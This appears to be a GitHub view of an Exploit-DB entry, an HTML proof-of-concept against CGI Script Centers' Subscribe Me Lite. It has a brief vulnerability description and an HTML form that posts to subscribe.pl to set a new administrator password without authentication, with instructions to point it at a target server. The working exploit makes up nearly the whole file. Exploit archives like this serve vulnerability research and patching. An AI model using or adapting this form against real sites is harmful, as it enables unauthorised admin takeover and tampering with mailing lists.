forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path20177.html
More file actions
executable file
·39 lines (35 loc) · 1.79 KB
/
Copy path20177.html
File metadata and controls
executable file
·39 lines (35 loc) · 1.79 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
source: http://www.securityfocus.com/bid/1607/info
Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists.
<html>
<FORM ACTION="http://www.cgiscriptcenter.com/cgi-bin/subprodemo/subscribe.pl" METHOD="POST">
<CENTER><BR>
<TABLE BORDER="0" WIDTH="400">
<TBODY>
<TR>
<TD>
<P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">Subscribe
Me LITE</FONT> Status: Admin Password Set Vulnerability Exploit</FONT></B></P>
<CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></CENTER>
<P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter the NEW Admin Pass: .</FONT></P>
<CENTER>
<TABLE BORDER="0">
<TBODY>
<TR>
<TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd"></TD>
<TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD>
</TR>
<TR>
<TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD>
<TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD>
</TR>
<TR>
<TD ALIGN="CENTER"><BR>
<INPUT TYPE="SUBMIT" NAME="setpwd" VALUE=" Set Password "></TD>
<TD><BR>
<INPUT TYPE="RESET" NAME=""></TD>
</TR></TBODY>
</TABLE></CENTER></TD>
</TR></TBODY>
</TABLE>
<FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to subscribe.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER></FORM>
</html>